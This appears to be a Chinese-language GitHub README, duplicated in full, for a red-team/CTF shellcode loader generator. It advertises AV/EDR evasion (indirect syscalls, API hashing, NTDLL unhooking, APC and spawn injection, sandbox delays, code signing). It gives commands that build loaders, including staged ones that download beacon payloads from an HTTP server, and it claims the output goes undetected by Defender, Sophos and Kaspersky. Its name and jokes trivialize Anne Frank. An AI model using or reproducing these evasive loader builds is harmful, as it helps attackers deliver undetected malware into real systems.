Excalibra/AnneFrankInjector
GitHub: Excalibra/AnneFrankInjector
面向红队和CTF的Shellcode加载器生成工具,集成多种AV/EDR规避技术,帮助安全人员快速构建免杀载荷并注入目标进程。
Stars: 17 | Forks: 1
# AnneFrankInjector
## 目录
- [AnneFrankInjector](#annefrankinjector)
- [目标](#goal)
- [基本信息](#general-information)
- [规避特性](#evasion-features)
- [安装](#installation)
- [前置条件](#prerequisites)
- [安装 AnneFrankInjector](#install-annefrankinjector)
- [用法](#usage)
- [图形界面](#graphical-interface-recommended)
- [命令行界面](#command-line-interface)
- [示例](#examples)
- [待办事项](#to-do)
- [检测情况](#detections)
- [致谢 - 参考](#credits---references)
## 目标
创建此仓库是为了在 CTF 和红队行动中简化 AV/EDR 的规避。主要目标是让你能更专注于攻破目标,而不是在如何绕过检测上苦苦挣扎!
你的 shellcode 藏得比躲在密室里的 Anne Frank 还要好——直到某个爱管闲事的邻居(Defender)把它给供出来。
查看我的博客文章了解更多信息:[Evade Modern AVs in 2026](#)
## 基本信息
## 规避特性
- **无阶段**:Shellcode 直接嵌入到加载器中。
- **分阶段**:通过 HTTP 获取 Shellcode(动态加密)。
- **规避**:
- 间接系统调用 (Syswhispers)
- API 哈希 (Djb2)
- NTDLL unhooking (KnownDLLs)
- AES-128-CBC 加密
- EarlyBird APC 注入
- **新增:** Spawn 注入——创建新进程(例如,notepad.exe)并注入其中(稳定可靠,可规避检测)
- **新增:** 自定义目标进程——可注入到任何名称的进程中(不仅限于 RuntimeBroker/svchost)
- **新增:** 注入前延迟——可规避具有短超时机制的沙箱
- 函数/变量名混淆 (`-s`)
- **输出**:EXE 或 DLL(导出函数为 `af`)。
- **代码签名**:可选择使用 PFX 证书。
- **GUI**:通过用户友好的 `tkinter` 界面提供所有选项。
## 安装
### 前置条件
- **Python 3.8+** 和 `pip`
- **MinGW‑w64** 交叉编译器(用于构建 Windows 可执行文件)
- **NASM**(用于汇编代码)
- **osslsigncode**(可选,用于签名)
**在 Kali / 基于 Debian 的 Linux 上:**
```
sudo apt update
sudo apt install clang mingw-w64 nasm lld osslsigncode
```
**在 Windows 上:**
安装 [MSYS2](https://www.msys2.org/),然后在其终端中运行:
```
pacman -Syu
pacman -S mingw-w64-x86_64-clang make nasm
```
### 安装 AnneFrankInjector
#### Linux (Kali / Debian 系列)
1. **克隆仓库**并进入文件夹:
git clone https://github.com/Excalibra/AnneFrankInjector.git
cd AnneFrankInjector
2. **创建虚拟环境**并安装依赖:
python3 -m venv env
source env/bin/activate
pip install -r Linux/requirements.txt
3. **运行 GUI**(从根目录运行):
python af.py
对于命令行用法,进入 `Linux` 文件夹:
cd Linux
python main.py -h
4. **可选 – 全局 CLI 安装**(使 `afpacker` 在系统范围内可用):
pipx install .
#### Windows
1. **克隆仓库**并进入文件夹:
git clone https://github.com/Excalibra/AnneFrankInjector.git
cd AnneFrankInjector
2. **创建虚拟环境**并安装依赖:
python -m venv env
env\Scripts\activate
pip install -r Windows\requirements.txt
3. **运行 GUI**(从根目录运行):
python af.py
对于命令行用法,进入 `Windows` 文件夹:
cd Windows
python main.py -h
4. **可选 – 全局 CLI 安装**(使 `afpacker` 在系统范围内可用):
pipx install .
## 用法
### 图形界面 (推荐)
从项目根目录运行 GUI:
```
python af.py
```
该窗口允许你:
- 选择你的原始 shellcode 文件 (`.bin`)。
- 在 **无阶段** (嵌入) 或 **分阶段** (HTTP 下载) 之间进行选择。
- 设置加密、混淆、输出格式 (EXE/DLL)、APC 目标、**延迟**和 **spawn 注入** (带有自定义进程路径) 等选项。
- 点击 **Generate Loader** —— 输出将显示在文本区域中,并且加载器将保存在当前文件夹中。
### 命令行界面
安装后(或从 `Linux` 文件夹中),你可以使用 `afpacker` 命令(或 `python main.py`)。其语法与原始的 CTFPacker 类似。
#### 无阶段 (嵌入 shellcode)
```
afpacker stageless -p payload.bin -e -s -o myloader [--delay 5] [--spawn] [--spawn-path "C:\\Windows\\System32\\notepad.exe"]
```
- `-p` : 原始 shellcode 文件
- `-e` : 加密 shellcode
- `-s` : 混淆函数/变量名
- `-o` : 输出文件名 (不带扩展名;默认为 `afloader`)
- `-f DLL` : 构建 DLL 而不是 EXE
- `--delay` : 注入前等待的秒数 (默认为 0)
- `--spawn` : 使用 spawn 注入 (创建一个新进程)
- `--spawn-path` : 要生成的可执行文件的路径 (默认:`C:\Windows\System32\notepad.exe`)
#### 分阶段 (通过 HTTP 获取 shellcode)
```
afpacker staged -p payload.bin -i 192.168.1.10 -po 8080 -pa /shellcode.bin -e -s -o myloader
```
- `-i` : HTTP 服务器的 IP 地址
- `-po` : 端口
- `-pa` : 服务器上的路径 (例如,`/shellcode.bin`)
- `--delay`、`--spawn`、`--spawn-path` 也适用于分阶段 (尽管分阶段变体最初使用 `download.c`——请确保模板也支持 spawn 注入)。
#### 代码签名
在任何命令中添加 `-pfx cert.pfx -pfx-pass password` 以对输出文件进行签名。
#### 输出格式
添加 `-f DLL` 以生成 DLL。导出的函数名为 `af`。使用以下命令执行它:
```
rundll32.exe afloader.dll,af
```
## 示例
**无阶段、加密、混淆的 EXE,带有 5 秒延迟:**
```
afpacker stageless -p calc.bin -e -s --delay 5
# 创建 afloader.exe
```
**无阶段、注入到 notepad.exe 的 spawn 注入,延迟 10 秒:**
```
afpacker stageless -p beacon.bin -e -s --spawn --spawn-path "C:\\Windows\\System32\\notepad.exe" --delay 10 -o beacon
```
**分阶段 DLL,自定义输出名称,带有 spawn 注入:**
```
afpacker staged -p beacon.bin -i 10.0.0.5 -po 80 -pa /payload.bin -f DLL -o beacon --spawn --spawn-path "C:\\Windows\\System32\\calc.exe"
```
## 待办事项
- [x] Setup.py / pipx 支持
- [x] 注入前延迟
- [x] Spawn 注入 (新进程)
- [x] 自定义 APC 目标 (任何进程名)
- [ ] 高级持久化功能 (例如,计划任务、注册表、WMI)
- [ ] AMSI / ETW 绕过 (因为即使是日记也需要保持沉默)
- [ ] 更多注入技术 (也许会加入“被邻居出卖”式的自删除功能)
## 检测情况
- 在最新的 Windows 11 Defender 上未检测到 (使用延迟 + spawn 注入)
- 在 Windows 10 Defender 上未检测到
- 在 Sophos、Kaspersky 等软件上未检测到
## 致谢 - 参考
大部分代码并非由我编写。以下是原作者 (现已在新项目中正确致谢):
```
@ Excalibra - Main developer, attic architect, and professional snitch-hater
@ Maldevacademy - https://maldevacademy.com
@ SaadAhla - https://github.com/SaadAhla/ntdlll-unhooking-collection
@ VX-Underground - https://github.com/vxunderground/VX-API/blob/main/VX-API/GetProcAddressDjb2.cpp
@ klezVirus - https://github.com/klezVirus/SysWhispers3
```
## 目录
- [AnneFrankInjector](#annefrankinjector)
- [目标](#goal)
- [基本信息](#general-information)
- [规避特性](#evasion-features)
- [安装](#installation)
- [前置条件](#prerequisites)
- [安装 AnneFrankInjector](#install-annefrankinjector)
- [用法](#usage)
- [图形界面](#graphical-interface-recommended)
- [命令行界面](#command-line-interface)
- [示例](#examples)
- [待办事项](#to-do)
- [检测情况](#detections)
- [致谢 - 参考](#credits---references)
## 目标
创建此仓库是为了在 CTF 和红队行动中简化 AV/EDR 的规避。主要目标是让你能更专注于攻破目标,而不是在如何绕过检测上苦苦挣扎!
你的 shellcode 藏得比躲在密室里的 Anne Frank 还要好——直到某个爱管闲事的邻居(Defender)把它给供出来。
查看我的博客文章了解更多信息:[Evade Modern AVs in 2026](#)
## 基本信息
## 规避特性
- **无阶段**:Shellcode 直接嵌入到加载器中。
- **分阶段**:通过 HTTP 获取 Shellcode(动态加密)。
- **规避**:
- 间接系统调用 (Syswhispers)
- API 哈希 (Djb2)
- NTDLL unhooking (KnownDLLs)
- AES-128-CBC 加密
- EarlyBird APC 注入
- **新增:** Spawn 注入——创建新进程(例如,notepad.exe)并注入其中(稳定可靠,可规避检测)
- **新增:** 自定义目标进程——可注入到任何名称的进程中(不仅限于 RuntimeBroker/svchost)
- **新增:** 注入前延迟——可规避具有短超时机制的沙箱
- 函数/变量名混淆 (`-s`)
- **输出**:EXE 或 DLL(导出函数为 `af`)。
- **代码签名**:可选择使用 PFX 证书。
- **GUI**:通过用户友好的 `tkinter` 界面提供所有选项。
## 安装
### 前置条件
- **Python 3.8+** 和 `pip`
- **MinGW‑w64** 交叉编译器(用于构建 Windows 可执行文件)
- **NASM**(用于汇编代码)
- **osslsigncode**(可选,用于签名)
**在 Kali / 基于 Debian 的 Linux 上:**
```
sudo apt update
sudo apt install clang mingw-w64 nasm lld osslsigncode
```
**在 Windows 上:**
安装 [MSYS2](https://www.msys2.org/),然后在其终端中运行:
```
pacman -Syu
pacman -S mingw-w64-x86_64-clang make nasm
```
### 安装 AnneFrankInjector
#### Linux (Kali / Debian 系列)
1. **克隆仓库**并进入文件夹:
git clone https://github.com/Excalibra/AnneFrankInjector.git
cd AnneFrankInjector
2. **创建虚拟环境**并安装依赖:
python3 -m venv env
source env/bin/activate
pip install -r Linux/requirements.txt
3. **运行 GUI**(从根目录运行):
python af.py
对于命令行用法,进入 `Linux` 文件夹:
cd Linux
python main.py -h
4. **可选 – 全局 CLI 安装**(使 `afpacker` 在系统范围内可用):
pipx install .
#### Windows
1. **克隆仓库**并进入文件夹:
git clone https://github.com/Excalibra/AnneFrankInjector.git
cd AnneFrankInjector
2. **创建虚拟环境**并安装依赖:
python -m venv env
env\Scripts\activate
pip install -r Windows\requirements.txt
3. **运行 GUI**(从根目录运行):
python af.py
对于命令行用法,进入 `Windows` 文件夹:
cd Windows
python main.py -h
4. **可选 – 全局 CLI 安装**(使 `afpacker` 在系统范围内可用):
pipx install .
## 用法
### 图形界面 (推荐)
从项目根目录运行 GUI:
```
python af.py
```
该窗口允许你:
- 选择你的原始 shellcode 文件 (`.bin`)。
- 在 **无阶段** (嵌入) 或 **分阶段** (HTTP 下载) 之间进行选择。
- 设置加密、混淆、输出格式 (EXE/DLL)、APC 目标、**延迟**和 **spawn 注入** (带有自定义进程路径) 等选项。
- 点击 **Generate Loader** —— 输出将显示在文本区域中,并且加载器将保存在当前文件夹中。
### 命令行界面
安装后(或从 `Linux` 文件夹中),你可以使用 `afpacker` 命令(或 `python main.py`)。其语法与原始的 CTFPacker 类似。
#### 无阶段 (嵌入 shellcode)
```
afpacker stageless -p payload.bin -e -s -o myloader [--delay 5] [--spawn] [--spawn-path "C:\\Windows\\System32\\notepad.exe"]
```
- `-p` : 原始 shellcode 文件
- `-e` : 加密 shellcode
- `-s` : 混淆函数/变量名
- `-o` : 输出文件名 (不带扩展名;默认为 `afloader`)
- `-f DLL` : 构建 DLL 而不是 EXE
- `--delay` : 注入前等待的秒数 (默认为 0)
- `--spawn` : 使用 spawn 注入 (创建一个新进程)
- `--spawn-path` : 要生成的可执行文件的路径 (默认:`C:\Windows\System32\notepad.exe`)
#### 分阶段 (通过 HTTP 获取 shellcode)
```
afpacker staged -p payload.bin -i 192.168.1.10 -po 8080 -pa /shellcode.bin -e -s -o myloader
```
- `-i` : HTTP 服务器的 IP 地址
- `-po` : 端口
- `-pa` : 服务器上的路径 (例如,`/shellcode.bin`)
- `--delay`、`--spawn`、`--spawn-path` 也适用于分阶段 (尽管分阶段变体最初使用 `download.c`——请确保模板也支持 spawn 注入)。
#### 代码签名
在任何命令中添加 `-pfx cert.pfx -pfx-pass password` 以对输出文件进行签名。
#### 输出格式
添加 `-f DLL` 以生成 DLL。导出的函数名为 `af`。使用以下命令执行它:
```
rundll32.exe afloader.dll,af
```
## 示例
**无阶段、加密、混淆的 EXE,带有 5 秒延迟:**
```
afpacker stageless -p calc.bin -e -s --delay 5
# 创建 afloader.exe
```
**无阶段、注入到 notepad.exe 的 spawn 注入,延迟 10 秒:**
```
afpacker stageless -p beacon.bin -e -s --spawn --spawn-path "C:\\Windows\\System32\\notepad.exe" --delay 10 -o beacon
```
**分阶段 DLL,自定义输出名称,带有 spawn 注入:**
```
afpacker staged -p beacon.bin -i 10.0.0.5 -po 80 -pa /payload.bin -f DLL -o beacon --spawn --spawn-path "C:\\Windows\\System32\\calc.exe"
```
## 待办事项
- [x] Setup.py / pipx 支持
- [x] 注入前延迟
- [x] Spawn 注入 (新进程)
- [x] 自定义 APC 目标 (任何进程名)
- [ ] 高级持久化功能 (例如,计划任务、注册表、WMI)
- [ ] AMSI / ETW 绕过 (因为即使是日记也需要保持沉默)
- [ ] 更多注入技术 (也许会加入“被邻居出卖”式的自删除功能)
## 检测情况
- 在最新的 Windows 11 Defender 上未检测到 (使用延迟 + spawn 注入)
- 在 Windows 10 Defender 上未检测到
- 在 Sophos、Kaspersky 等软件上未检测到
## 致谢 - 参考
大部分代码并非由我编写。以下是原作者 (现已在新项目中正确致谢):
```
@ Excalibra - Main developer, attic architect, and professional snitch-hater
@ Maldevacademy - https://maldevacademy.com
@ SaadAhla - https://github.com/SaadAhla/ntdlll-unhooking-collection
@ VX-Underground - https://github.com/vxunderground/VX-API/blob/main/VX-API/GetProcAddressDjb2.cpp
@ klezVirus - https://github.com/klezVirus/SysWhispers3
```
标签:AES加密, API哈希, AV绕过, C++, Chrome扩展, Dionaea, Djb2, DLL注入, DNS 反向解析, DNS 解析, EarlyBird APC注入, EDR绕过, evasion, FastAPI, Go, GUI工具, MinGW, NTDLL脱钩, Python, Ruby工具, Shellcode执行, Spawn注入, SSH蜜罐, tkinter, 代码混淆, 反沙箱, 安全对抗, 客户端加密, 延时执行, 技术指纹识别, 数据展示, 数据擦除, 无后门, 流量审计, 红队, 网络信息收集, 网络安全, 进程注入, 逆向工具, 间接系统调用, 隐私保护, 高交互蜜罐